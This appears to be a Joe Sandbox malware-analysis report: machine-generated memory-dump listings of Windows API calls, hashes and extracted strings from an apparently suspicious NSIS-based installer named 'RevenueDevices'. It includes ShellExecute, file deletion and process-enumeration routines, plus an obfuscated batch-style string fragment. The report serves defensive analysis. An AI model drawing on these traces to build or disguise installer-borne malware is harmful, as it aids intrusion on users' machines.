                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: ... %d%%$Set Niger=gMoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-lMAAlien-UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-lNCompleted-KRuxInjection-Med-HeTft-Crazy-Sh$X1C$X1C
                                          • API String ID: 651206458-337224829
                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                          APIs
                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GlobalFree.KERNELBASE(007ADB60), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: %NodeTransexual%$Exch: stack < %d elements$Pop: stack empty
                                          • API String ID: 1459762280-4090470853
                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • GlobalFree.KERNELBASE(007ADB60), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: %NodeTransexual%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-375107294
                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                          APIs
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          APIs
                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID:
                                          • API String ID: 3394109436-0
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          APIs
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                          • DeleteObject.GDI32(?), ref: 00404A79
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                          • FindClose.KERNEL32(?), ref: 00406E33
                                          Strings
                                          • \*.*, xrefs: 00406D03
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                          • API String ID: 2035342205-3294556389
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                          • GetSysColor.USER32(?), ref: 004041AF
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
